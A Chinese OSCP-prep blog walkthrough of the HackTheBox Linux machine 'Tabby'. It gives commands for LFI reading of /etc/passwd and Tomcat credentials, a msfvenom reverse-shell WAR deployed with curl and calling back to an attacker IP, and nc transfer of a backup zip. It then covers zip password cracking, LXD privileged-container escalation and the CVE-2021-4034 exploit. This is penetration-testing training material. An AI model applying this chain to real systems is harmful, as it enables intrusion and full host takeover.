OSCP备考_0x29_HackThBox靶机_Linux_tabby

Ethan医生4个月前靶场128

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)

image.png



nmap -sU --top-ports 100 10.129.173.82 (扫描UDP)



gobuster dir -u http://megahosting.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html





需要绑定HOST

megahosting.htb

http://megahosting.htb/

image.png

http://megahosting.htb/news.php?file=../../../../../etc/passwd,发现一个lfi


image.png




http://megahosting.htb:8080/

image.png

正常的是在这个路径下usr/share/tomcat9/conf/tomcat-users.xml

去看了题本是etc下的这是因为这台机器是debian系统

使用lfi去看./../../../../../../usr/share/tomcat9/etc/tomcat-users.xml默认凭证


image.png

tomcat,$3cureP4s5w0rd123!

没有找到利用的地方直接上传木马

先生成一war包

msfvenom -p java/shell_reverse_tcp lhost=10.10.16.31 lport=3333 -f war -o shell.war

image.png

然后使用curl,将war上传

curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.129.173.82:8080/manager/text/deploy?path=/rong --upload-file shell.war

访问http://10.129.173.82:8080/deploy?path=/rong

image.png

权限提升

查看网站目录,发现file目录下存在zip文件,如图:

nc -lvnp 4444 > file.zip

将文件下载下来

nc 10.10.16.31 4444 < 16162020_backup.zip

然后爆破ZIP密码

zip2john file.zip > passwd.txt

john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt 

image.png

发现密码是admin@it


有可能这也是ash密码 尝试看看

尝试使用su命令和改密码切换用户成功,如图:

image.png

没有可利用的文件,使用提权辅助脚本LinEnum.sh枚举,如图:

image.png

LXD权限滥用 

通过搜索引擎搜索发现Lxd权限提升,按照其利用步骤在Kali Linux分别执行:


git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine



lxc image import ./alpine-v3.12-x86_64-20200714_0459.tar.gz --alias nhpt

lxc init nhpt ignite -c security.privileged=true

lxc config device add ignite nhpt disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

先执行前两步导入到镜像,并初始化镜像到ignite容器,



还有另外一个方法

# 下载利用代码

git clone https://github.com/berdav/CVE-2021-4034.git

cd CVE-2021-4034

make

./cve-2021-4034  # 获取root shell


标签: OSCP

相关文章

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

OSCP备考_0x30_HackThBox靶机_Linux_Doctor

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.7.227 (扫描TCP)nmap -sU --top-ports 100 10.129.7.22...

OSCP备考_0x02_Vulnhub靶机_KIOPTRIX:LEVEL1.1(#2)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-11-2,23/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。